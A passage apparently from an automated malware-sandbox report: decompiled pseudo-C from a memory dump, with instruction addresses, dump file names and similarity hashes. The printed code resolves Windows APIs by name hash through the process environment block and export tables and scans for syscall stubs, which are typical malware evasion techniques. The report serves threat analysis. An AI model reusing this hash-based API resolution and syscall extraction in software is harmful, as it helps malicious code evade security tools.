											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x705792e3
0x705792e7
0x705792f3
0x705792f7
0x705792fb
0x70579300
0x70579303
0x70579305
0x70579307
0x70579307
0x7057930a
0x70579310
0x70579388
0x7057938c
0x7057938f
0x7057938f
0x70579392
0x00000000
0x70579392
0x70579317
0x7057937f
0x70579383
0x00000000
0x70579383
0x7057931e
0x70579377
0x7057937a
0x00000000
0x7057937a
0x70579323
0x70579361
0x70579368
0x7057936b
0x70579334
0x70579334
0x7057933a
0x00000000
0x00000000
0x7057933f
0x70579359
0x7057935c
0x00000000
0x7057935c
0x70579344
0x00000000
0x70579346
0x7057934a
0x7057934d
0x00000000
0x7057934d
0x70579344
0x70579395
0x70579395
0x70579395
0x7057939e
0x705793a7
0x705793aa
0x705793ad
0x705793b0
0x705793b3
0x705793b9
0x705793fb
0x705793fe
0x705793ff
0x70579406
0x70579409
0x705793bb
0x705793bf
0x705793c9
0x705793d0
0x705793d2
0x705793eb
0x705793ee
0x705793ee
0x705793d0
0x70579411
0x70579414
0x70579417
0x7057941b
0x7057941f
0x70579429
0x7057942d
0x70579437
0x70579440
0x7057944d
0x70579450
0x70579453
0x70579453
0x7057945f
0x7057946a
0x70579470
0x70579474
0x70579461
0x70579461
0x70579461
0x7057947c
0x705794a6
0x705794ac
0x705794ac
0x705794b4
0x7057985d
0x70579863
0x70579869
0x70579869
0x00000000
0x705794ba
0x705794ba
0x705794be
0x705794c1
0x705794c4
0x705794c7
0x705794cb
0x705794cd
0x705794d0
0x705794d3
0x705794d7
0x705794dc
0x705794df
0x705794e3
0x705794e8
0x705794eb
0x705794ed
0x705794f0
0x705794f4
0x705794f9
0x70579509
0x7057950f
0x7057950f
0x70579517
0x70579519
0x70579522
0x70579524
0x70579527
0x70579532
0x7057955f
0x70579534
0x7057954b
0x7057954b
0x70579567
0x7057956d
0x70579573
0x70579573
0x70579567
0x70579522
0x7057957a
0x705795eb
0x705795f0
0x70579649
0x7057970b
0x70579710
0x7057971f
0x70579725
0x70579729
0x70579732
0x70579739
0x70579742
0x70579750
0x70579753
0x7057973b
0x7057973b
0x7057973b
0x70579739
0x7057975c
0x70579789
0x7057979c
0x705797a4
0x7057978b
0x7057978d
0x70579795
0x70579795
0x7057975e
0x70579763
0x70579782
0x70579765
0x7057976a
0x7057977b
0x7057976c
0x7057976c
0x7057976c
0x7057976a
0x70579763
0x705797ac
0x705797bb
0x705797c8
0x705797d1
0x705797d5
0x705797d9
0x705797dc
0x705797df
0x705797e2
0x705797e5
0x705797e8
0x705797ee
0x705797f2
0x705797f8
0x705797f8
0x705797ee
0x705797fe
0x7057983b
0x7057983f
0x70579846
0x7057984c
0x70579800
0x70579803
0x70579823
0x70579827
0x7057982e
0x70579835
0x70579805
0x70579808
0x7057980a
0x7057980e
0x70579818
0x7057981e
0x7057981e
0x70579808
0x70579803
0x70579853
0x70579853
0x7057986c
0x7057986c
0x70579872
0x70579877
0x705798d1
0x705798d6
0x70579915
0x7057991a
0x7057991c
0x70579920
0x70579923
0x70579926
0x70579928
0x70579929
0x70579929
0x7057992e
0x7057994c
0x7057994e
0x70579952
0x70579958
0x7057995b
0x7057995d
0x7057995e
0x7057995e
0x00000000
0x70579930
0x70579930
0x70579930
0x70579934
0x7057993a
0x7057993d
0x7057993f
0x70579942
0x70579961
0x70579961
0x70579968
0x70579982
0x7057996a
0x7057996a
0x70579976
0x70579977
0x7057997a
0x7057997a
0x70579990
0x70579990
0x7057992e
0x705798db
0x705798e9
0x70579901
0x70579905
0x70579908
0x7057990e
0x70579912
0x70579912
0x00000000
0x70579912
0x705798eb
0x705798ef
0x705798f5
0x705798f5
0x705798fb
0x00000000
0x705798fb
0x705798dd
0x705798e1
0x00000000
0x705798e1
0x7057987b
0x705798a7
0x705798bf
0x705798c3
0x705798c6
0x705798c9
0x705798cb
0x705798ce
0x705798a9
0x705798a9
0x705798ad
0x705798b0
0x705798b3
0x705798b6
0x705798b9
0x705798b9
0x00000000
0x705798a7
0x70579881
0x00000000
0x00000000
0x70579887
0x7057988b
0x70579891
0x70579894
0x70579897
0x7057989a
0x00000000
0x7057989a
0x70579712
0x70579716
0x7057971c
0x00000000
0x7057971c
0x70579654
0x70579666
0x7057966b
0x705796d6
0x00000000
0x00000000
0x705796dd
0x70579703
0x70579707
0x00000000
0x00000000
0x705796e6
0x705796eb
0x705796ff
0x00000000
0x00000000
0x00000000
0x70579701
0x705796f2
0x00000000
0x00000000
0x705796f7
0x00000000
0x00000000
0x705796f9
0x00000000
0x705796dd
0x7057966d
0x70579677
0x70579688
0x7057968b
0x7057968e
0x70579694
0x00000000
0x00000000
0x00000000
0x00000000
0x7057969a
0x7057969a
0x7057969a
0x705796a1
0x00000000
0x00000000
0x705796a3
0x705796a6
0x705796ac
0x00000000
0x00000000
0x00000000
0x705796ae
0x705796b0
0x705796b9
0x00000000
0x00000000
0x705796cd
0x00000000
0x00000000
0x00000000
0x705796cf
0x7057965b
0x00000000
0x00000000
0x00000000
0x70579661
0x705795f5
0x70579624
0x70579625
0x7057962e
0x00000000
0x7057963f
0x00000000
0x7057963f
0x705795fc
0x705795ff
0x70579612
0x70579613
0x70579617
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x705795ff
0x705795f5
0x70579581
0x705795de
0x705795e2
0x705795e8
0x00000000
0x705795e8
0x70579583
0x70579587
0x70579594
0x70579598
0x705795ae
0x705795b6
0x7057959a
0x7057959c
0x705795a6
0x705795a6
0x705795bc
0x705795c5
0x705795dc
0x00000000
0x00000000
0x00000000
0x705795dc
0x705795c7
0x705795c7
0x00000000
0x705795bc

Strings

, xrefs: 70579947

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
Instruction ID: 03c91887bf6244a4287fb9623c905d9e67c4b78a614a5fa111c2319a595b4ff5
Opcode Fuzzy Hash: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
Instruction Fuzzy Hash: 4E22AD304083998BE71ADE25C49136EBFF5FF86300F10D86EE9D64B291D3359945EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 705714D8, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E705714D8(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E705703A0(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x7057d208 == 0 ||  *0x7057d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0x212ae3b8;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E70574BE0( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x7057d2ec |  *0x7057d2ed;
									if(( *0x7057d2ec |  *0x7057d2ed) == 0) {
										_t525 =  *0x7057d208; // 0x4f31340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x7057d2ec = 1;
											_t526 = E70573558(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E70571CCC(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x7057d208 = _t526;
											 *0x7057d2ec = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E70573558(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E70571CCC(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E7056E070(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E7056E070(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0xd926c223;
									if(_t535[0x54] == 0xd926c223) {
										 *0x7057d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x80febacc;
										if(_t535[0x54] == 0x80febacc) {
											 *0x7057d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E7056E94C( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E70572F94(0xa5eabdf8, 0x9766f056, 0xa5eabdf8, 0xa5eabdf8);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x7057d2e4 = 1;
					E7056F620( &(_t535[0x38]), 0);
					E7056F620( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E7056F558( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E70572F94(0xa5eabdf8, 0x22dc1034, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E7056F8C4( &(_t535[0xc]), E7056F568( &(_t535[8])) + 0x14);
								_t369 = E7056F558( &(_t535[0xc]), E7056F568( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E7056F6F0( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E7056F620( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E7056F6F0( &(_t535[8]));
							E7056F6F0( &(_t535[0x164]));
							E7056F620( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E7056F620( &(_t535[0x20]), 0);
							_push(0xa5eabdf8);
							_t289 = E70571DD0(0xa5eabdf8);
							_t290 = E70571388( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E70571D08( &(_t535[0x164]), 0xa5eabdf8);
							_t518 =  &(_t535[0x178]);
							E7056D0D0( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E70575C40( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E70575C74( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E70578D74( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E7056F6F0( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E7056BC00( &(_t535[0x110]));
							}
							E7056D098( &(_t535[0x104]));
							E7056D098(_t518);
							E7056D098( &(_t535[0x15c]));
							E7056D098( &(_t535[0x154]));
							E70579058( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E7056F6B4( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E7057901C( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E7056F558( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E7056F568( &(_t535[0x44]));
								_t519 =  *(0x7057bce0 + _t381 * 4);
								_t531 = E70578FE8( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E70578754( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E7056F568( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E7056F578( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E7056F568( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E7056F8C4( &(_t535[0x20]), E7056F568( &(_t535[0x1c])) + 8);
										E7056F558( &(_t535[0x20]), E7056F568( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E705730A4(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E7056F8C4( &(_t535[0x48]), _t535[0x70]);
									E705730A4(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E7056F8DC( &(_t535[0x44]), _t563);
									E7056F8DC( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E705790A8( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E70579070( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E7056F6F0( &(_t535[0x144]));
									E7056F6F0( &(_t535[0x134]));
									goto L38;
								}
								 *0x7057d2e8 =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E7056F6F0( &(_t535[0x11c]));
							E70578DD4(_t381,  &(_t535[0xd8]));
							E7056F6F0( &(_t535[0x1c]));
							E7056F6F0( &(_t535[0x44]));
							E7056F6F0( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E7056F558( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E7056F8C4( &(_t535[0x38]), E7056F568( &(_t535[0x34])) + 0x14);
							_t347 = E7056F558( &(_t535[0x38]), E7056F568( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E7056F558( &(_t535[0xc]), _t62);
						_t455 = E7056F558( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x705714e4
0x705714eb
0x705714ee
0x705714f5
0x70571c77
0x70571c77
0x705714fb
0x70571506
0x70571a45
0x70571a49
0x00000000
0x70571cc8
0x70571a4f
0x70571a52
0x70571a55
0x70571a5f
0x70571a6e
0x70571a70
0x70571a77
0x70571c61
0x70571c63
0x70571c66
0x70571c6a
0x00000000
0x70571c6a
0x70571a86
0x70571a91
0x70571a98
0x70571a9b
0x70571a9d
0x70571aa0
0x70571aa3
0x70571aa9
0x70571ab7
0x70571ac7
0x70571aec
0x70571afd
0x70571b00
0x70571b02
0x70571b66
0x70571b69
0x70571b69
0x70571b6b
0x70571b6e
0x70571b72
0x70571b72
0x70571b76
0x00000000
0x00000000
0x70571b83
0x70571b89
0x70571bbd
0x70571bc3
0x70571bc5
0x70571c94
0x70571c9c
0x70571c9f
0x70571ca1
0x70571cb8
0x70571cb8
0x70571ca3
0x70571ca7
0x70571cac
0x70571cac
0x70571cba
0x70571cc0
0x70571bdf
0x70571bdf
0x70571be1
0x70571be1
0x70571be3
0x70571be3
0x70571be8
0x00000000
0x00000000
0x70571bea
0x70571beb
0x70571bee
0x70571bf1
0x00000000
